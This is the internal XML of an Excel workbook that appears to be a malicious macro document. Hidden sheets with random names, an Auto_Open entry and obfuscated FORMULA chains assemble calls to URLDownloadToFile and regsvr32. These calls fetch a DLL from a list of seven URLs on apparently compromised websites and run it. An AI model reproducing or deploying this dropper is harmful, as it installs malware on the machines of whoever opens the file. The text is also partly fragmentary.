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7m\CIR-ZV\ZV\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{898F990F-BF1D-4DCB-B227-4E7A7F369DC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Rgbdsb" sheetId="2" state="hidden" r:id="rId2"/>
    <sheet name="Vebhnsv" sheetId="3" state="hidden" r:id="rId3"/>
    <sheet name="Kgev" sheetId="4" state="hidden" r:id="rId4"/>
    <sheet name="SCWVCV" sheetId="6" state="hidden" r:id="rId5"/>
  </sheets>
  <definedNames>
    <definedName name="ICDV1">SCWVCV!$D$14</definedName>
    <definedName name="ICDV2">SCWVCV!$D$16</definedName>
    <definedName name="ICDV3">SCWVCV!$D$18</definedName>
    <definedName name="ICDV4">SCWVCV!$D$20</definedName>
    <definedName name="ICDV5">SCWVCV!$D$22</definedName>
    <definedName name="ICDV6">SCWVCV!$D$24</definedName>
    <definedName name="ICDV7">SCWVCV!$D$26</definedName>
    <definedName name="_xlnm.Auto_Open">SCWVCV!$D$1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1" i="3" l="1"/>
  <c r="M14" i="3"/>
  <c r="G6" i="3"/>
  <c r="E9" i="3"/>
  <c r="C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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="19" uniqueCount="19">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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",0,0)</t>
  </si>
  <si>
    <t>,0,</t>
  </si>
  <si>
    <t xml:space="preserve"> ..\kytk.dll</t>
  </si>
  <si>
    <t>"..\kytk.dll</t>
  </si>
  <si>
    <t>r"&amp;"eg"&amp;"sv"&amp;"r3"&amp;"2.exe</t>
  </si>
  <si>
    <t>\W"&amp;"i"&amp;"ndo"&amp;"ws\</t>
  </si>
  <si>
    <t>Sys"&amp;"Wow"&amp;"64\</t>
  </si>
  <si>
    <t>"https://banrai.ac.th/website/IHI0iNLLWDh9P/",</t>
  </si>
  <si>
    <t>"http://bangsoe.dk/__backup/JON6L/",</t>
  </si>
  <si>
    <t>"http://bahr.se/tvillingar2-filer/0wFIrmZ70Vl/",</t>
  </si>
  <si>
    <t>"https://barkstage.es/wp-content/S0Q/",</t>
  </si>
  <si>
    <t>"https://aquinoabogados.com.ar/newsletter/Zm7prnrQ55D1hrHqDC/",</t>
  </si>
  <si>
    <t>"http://ceibadiseno.com.mx/bandermex2/6a6wGJmNwx8/",</t>
  </si>
  <si>
    <t>"https://www.manchesterot.co.uk/about-us/LFXAJJIa/",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</si>
</sst>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379514</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>276224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5B4DC696-962D-40A9-9F1A-F57E99F08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0431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AF75768-EFDC-418E-80C3-5AA520842678}">
  <dimension ref="D10"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0">
      <selection activeCell="C3" sqref="C3"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="4" max="4" width="255.7109375" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="10" spans="4:4" x14ac:dyDescent="0.25">
      <c r="D10" t="b">
        <f>FORMULA(Rgbdsb!P22&amp;Rgbdsb!H9&amp;Rgbdsb!L2&amp;Rgbdsb!B15&amp;Rgbdsb!B15&amp;Vebhnsv!C3&amp;Vebhnsv!E9&amp;Rgbdsb!F10&amp;Vebhnsv!G6&amp;Rgbdsb!H4&amp;Rgbdsb!L2&amp;Vebhnsv!M14&amp;Kgev!K19&amp;Vebhnsv!F18&amp;Kgev!T17&amp;Kgev!G18,D14)=FORMULA(Rgbdsb!P22&amp;Rgbdsb!J11&amp;Rgbdsb!B18&amp;Rgbdsb!P11&amp;"ICDV1"&amp;Kgev!R7&amp;Rgbdsb!H9&amp;Rgbdsb!L2&amp;Rgbdsb!B15&amp;Rgbdsb!B15&amp;Vebhnsv!C3&amp;Vebhnsv!E9&amp;Rgbdsb!F10&amp;Vebhnsv!G6&amp;Rgbdsb!H4&amp;Rgbdsb!L2&amp;Vebhnsv!M14&amp;Kgev!K19&amp;Vebhnsv!G19&amp;Kgev!T17&amp;Kgev!G18&amp;Rgbdsb!P13,D16)=FORMULA(Rgbdsb!P22&amp;Rgbdsb!J11&amp;Rgbdsb!B18&amp;Rgbdsb!P11&amp;"ICDV2"&amp;Kgev!R7&amp;Rgbdsb!H9&amp;Rgbdsb!L2&amp;Rgbdsb!B15&amp;Rgbdsb!B15&amp;Vebhnsv!C3&amp;Vebhnsv!E9&amp;Rgbdsb!F10&amp;Vebhnsv!G6&amp;Rgbdsb!H4&amp;Rgbdsb!L2&amp;Vebhnsv!M14&amp;Kgev!K19&amp;Vebhnsv!H18&amp;Kgev!T17&amp;Kgev!G18&amp;Rgbdsb!P13,D18)=FORMULA(Rgbdsb!P22&amp;Rgbdsb!J11&amp;Rgbdsb!B18&amp;Rgbdsb!P11&amp;"ICDV3"&amp;Kgev!R7&amp;Rgbdsb!H9&amp;Rgbdsb!L2&amp;Rgbdsb!B15&amp;Rgbdsb!B15&amp;Vebhnsv!C3&amp;Vebhnsv!E9&amp;Rgbdsb!F10&amp;Vebhnsv!G6&amp;Rgbdsb!H4&amp;Rgbdsb!L2&amp;Vebhnsv!M14&amp;Kgev!K19&amp;Vebhnsv!I19&amp;Kgev!T17&amp;Kgev!G18&amp;Rgbdsb!P13,D20)=FORMULA(Rgbdsb!P22&amp;Rgbdsb!J11&amp;Rgbdsb!B18&amp;Rgbdsb!P11&amp;"ICDV4"&amp;Kgev!R7&amp;Rgbdsb!H9&amp;Rgbdsb!L2&amp;Rgbdsb!B15&amp;Rgbdsb!B15&amp;Vebhnsv!C3&amp;Vebhnsv!E9&amp;Rgbdsb!F10&amp;Vebhnsv!G6&amp;Rgbdsb!H4&amp;Rgbdsb!L2&amp;Vebhnsv!M14&amp;Kgev!K19&amp;Vebhnsv!J18&amp;Kgev!T17&amp;Kgev!G18&amp;Rgbdsb!P13,D22)=FORMULA(Rgbdsb!P22&amp;Rgbdsb!J11&amp;Rgbdsb!B18&amp;Rgbdsb!P11&amp;"ICDV5"&amp;Kgev!R7&amp;Rgbdsb!H9&amp;Rgbdsb!L2&amp;Rgbdsb!B15&amp;Rgbdsb!B15&amp;Vebhnsv!C3&amp;Vebhnsv!E9&amp;Rgbdsb!F10&amp;Vebhnsv!G6&amp;Rgbdsb!H4&amp;Rgbdsb!L2&amp;Vebhnsv!M14&amp;Kgev!K19&amp;Vebhnsv!K19&amp;Kgev!T17&amp;Kgev!G18&amp;Rgbdsb!P13,D24)=FORMULA(Rgbdsb!P22&amp;Rgbdsb!J11&amp;Rgbdsb!B18&amp;Rgbdsb!P11&amp;"ICDV6"&amp;Kgev!R7&amp;Rgbdsb!H9&amp;Rgbdsb!L2&amp;Rgbdsb!B15&amp;Rgbdsb!B15&amp;Vebhnsv!C3&amp;Vebhnsv!E9&amp;Rgbdsb!F10&amp;Vebhnsv!G6&amp;Rgbdsb!H4&amp;Rgbdsb!L2&amp;Vebhnsv!M14&amp;Kgev!K19&amp;Vebhnsv!L18&amp;Kgev!T17&amp;Kgev!G18&amp;Rgbdsb!P13,D26)=FORMULA(Rgbdsb!P22&amp;Rgbdsb!J11&amp;Rgbdsb!B18&amp;Rgbdsb!P11&amp;"ICDV7"&amp;Kgev!R7&amp;Rgbdsb!H9&amp;Rgbdsb!B15&amp;Rgbdsb!I17&amp;Rgbdsb!I3&amp;Rgbdsb!H13&amp;Rgbdsb!P11&amp;Rgbdsb!K9&amp;Rgbdsb!P13&amp;Rgbdsb!P7&amp;Rgbdsb!P13,D28)=FORMULA(Rgbdsb!P22&amp;Rgbdsb!H13&amp;Rgbdsb!N4&amp;Rgbdsb!H13&amp;Rgbdsb!H9&amp;Rgbdsb!P11&amp;Rgbdsb!P15&amp;Rgbdsb!H9&amp;Rgbdsb!P20&amp;Kgev!N14&amp;Kgev!O10&amp;Kgev!J6&amp;Rgbdsb!P19&amp;Vebhnsv!T11&amp;Kgev!H12&amp;Rgbdsb!P15&amp;Rgbdsb!P13,D30)=FORMULA(Rgbdsb!P22&amp;Rgbdsb!F4&amp;Rgbdsb!H13&amp;Rgbdsb!E6&amp;Rgbdsb!E11&amp;Rgbdsb!G24&amp;Rgbdsb!K23&amp;Rgbdsb!P11&amp;Rgbdsb!P13,D36)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88" sqref="AM88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22EA-8CB0-4343-BC79-A89A51BD74FC}">
  <dimension ref="A2:Q37"/>
  <sheetViews>
    <sheetView topLeftCell="A10" workbookViewId="0">
      <selection activeCell="A6" sqref="A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5B-974B-42A4-98D3-5D4AA8335232}">
  <dimension ref="C3:T19"/>
  <sheetViews>
    <sheetView topLeftCell="A7" workbookViewId="0">
      <selection activeCell="D14" sqref="D14"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="3" spans="3:20" x14ac:dyDescent="0.25">
      <c r="C3" t="str">
        <f>T(Rgbdsb!P11&amp;Rgbdsb!P15&amp;Rgbdsb!B5&amp;Rgbdsb!C3&amp;Rgbdsb!C9&amp;Rgbdsb!A12&amp;Rgbdsb!E2)</f>
        <v>("urlmo</v>
      </c>
    </row>
    <row r="6" spans="3:20" x14ac:dyDescent="0.25">
      <c r="G6" t="str">
        <f>T(Rgbdsb!D7&amp;Rgbdsb!C9&amp;Rgbdsb!E2&amp;Rgbdsb!D17&amp;Rgbdsb!F15&amp;Rgbdsb!E6&amp;Rgbdsb!E2&amp;Rgbdsb!B18&amp;Rgbdsb!G2&amp;Rgbdsb!C9)</f>
        <v>nloadToFil</v>
      </c>
    </row>
    <row r="9" spans="3:20" x14ac:dyDescent="0.25">
      <c r="E9" t="str">
        <f>T(Rgbdsb!D7&amp;Rgbdsb!P15&amp;Rgbdsb!P7&amp;Rgbdsb!P15&amp;Rgbdsb!E11&amp;Rgbdsb!F4&amp;Rgbdsb!B15&amp;Rgbdsb!D13&amp;Rgbdsb!E2)</f>
        <v>n","URLDo</v>
      </c>
    </row>
    <row r="11" spans="3:20" x14ac:dyDescent="0.25">
      <c r="T11" t="str">
        <f>T(Rgbdsb!P2&amp;Rgbdsb!M7)</f>
        <v>-s</v>
      </c>
    </row>
    <row r="14" spans="3:20" x14ac:dyDescent="0.25">
      <c r="M14" t="str">
        <f>T(Rgbdsb!P15&amp;Rgbdsb!P7&amp;Rgbdsb!P15&amp;Rgbdsb!J6&amp;Rgbdsb!J6&amp;Rgbdsb!H9&amp;Rgbdsb!H9&amp;Rgbdsb!K14&amp;Rgbdsb!K14&amp;Rgbdsb!P15)</f>
        <v>","JJCCBB"</v>
      </c>
    </row>
    <row r="18" spans="6:12" x14ac:dyDescent="0.25">
      <c r="F18" t="s">
        <v>12</v>
      </c>
      <c r="H18" t="s">
        <v>14</v>
      </c>
      <c r="J18" t="s">
        <v>16</v>
      </c>
      <c r="L18" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="19" spans="6:12" x14ac:dyDescent="0.25">
      <c r="G19" t="s">
        <v>13</v>
      </c>
      <c r="I19" t="s">
        <v>15</v>
      </c>
      <c r="K19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CA9F-34C1-42C3-96DF-E372BA877C2C}">
  <dimension ref="G6:T19"/>
  <sheetViews>
    <sheetView topLeftCell="A3" workbookViewId="0">
      <selection activeCell="O11" sqref="O11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="6" spans="8:18" x14ac:dyDescent="0.25">
      <c r="J6" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="7" spans="8:18" x14ac:dyDescent="0.25">
      <c r="R7" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="10" spans="8:18" x14ac:dyDescent="0.25">
      <c r="O10" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="12" spans="8:18" x14ac:dyDescent="0.25">
      <c r="H12" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="14" spans="8:18" x14ac:dyDescent="0.25">
      <c r="N14" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="17" spans="7:20" x14ac:dyDescent="0.25">
      <c r="T17" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="18" spans="7:20" x14ac:dyDescent="0.25">
      <c r="G18" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="19" spans="7:20" x14ac:dyDescent="0.25">
      <c r="K1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Rgbdsb</vt:lpstr>
      <vt:lpstr>Vebhnsv</vt:lpstr>
      <vt:lpstr>Kgev</vt:lpstr>
      <vt:lpstr>SCWVCV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2022-03-17T16:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>